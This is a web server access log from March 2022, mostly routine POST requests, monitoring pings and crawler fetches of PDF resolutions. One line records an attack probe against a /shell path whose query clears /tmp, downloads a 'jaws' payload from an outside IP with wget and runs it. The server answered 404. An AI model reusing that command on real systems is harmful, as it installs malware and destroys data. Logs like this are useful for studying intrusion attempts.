201.245.192.253 - - [20/Mar/2022:22:12:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115750
216.245.221.92 - - [20/Mar/2022:22:16:12 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.209 - - [20/Mar/2022:22:17:08 -0500] "GET /bla/resoluciones/resoluciones%202014/0044.pdf HTTP/1.1" 200 790781
66.249.73.127 - - [20/Mar/2022:22:19:04 -0500] "-" 408 -
201.245.192.253 - - [20/Mar/2022:22:20:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45437
216.245.221.92 - - [20/Mar/2022:22:21:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:22:21:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45765
201.245.192.253 - - [20/Mar/2022:22:22:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115750
34.221.0.83 - - [20/Mar/2022:22:23:59 -0500] "GET / HTTP/1.1" 200 319
40.77.167.46 - - [20/Mar/2022:22:24:52 -0500] "GET /bla/resoluciones/resoluciones%202014/3394.pdf HTTP/1.1" 200 209246
216.245.221.92 - - [20/Mar/2022:22:26:12 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.209 - - [20/Mar/2022:22:27:00 -0500] "GET /bla/resoluciones/resoluciones%202022/0046.pdf HTTP/1.1" 304 -
207.46.13.209 - - [20/Mar/2022:22:28:30 -0500] "GET /bla/resoluciones/resoluciones%202014/3891.pdf HTTP/1.1" 200 807450
201.245.192.253 - - [20/Mar/2022:22:30:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45437
216.245.221.92 - - [20/Mar/2022:22:31:12 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.209 - - [20/Mar/2022:22:31:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0810.pdf HTTP/1.1" 200 755169
201.245.192.253 - - [20/Mar/2022:22:31:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45765
45.48.252.106 - - [20/Mar/2022:22:34:35 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [20/Mar/2022:22:36:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:22:36:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115750
45.172.223.245 - - [20/Mar/2022:22:38:17 -0500] "GET /humedales-por-que-son-importantes-en-epoca-de-lluvia.html HTTP/1.1" 200 793
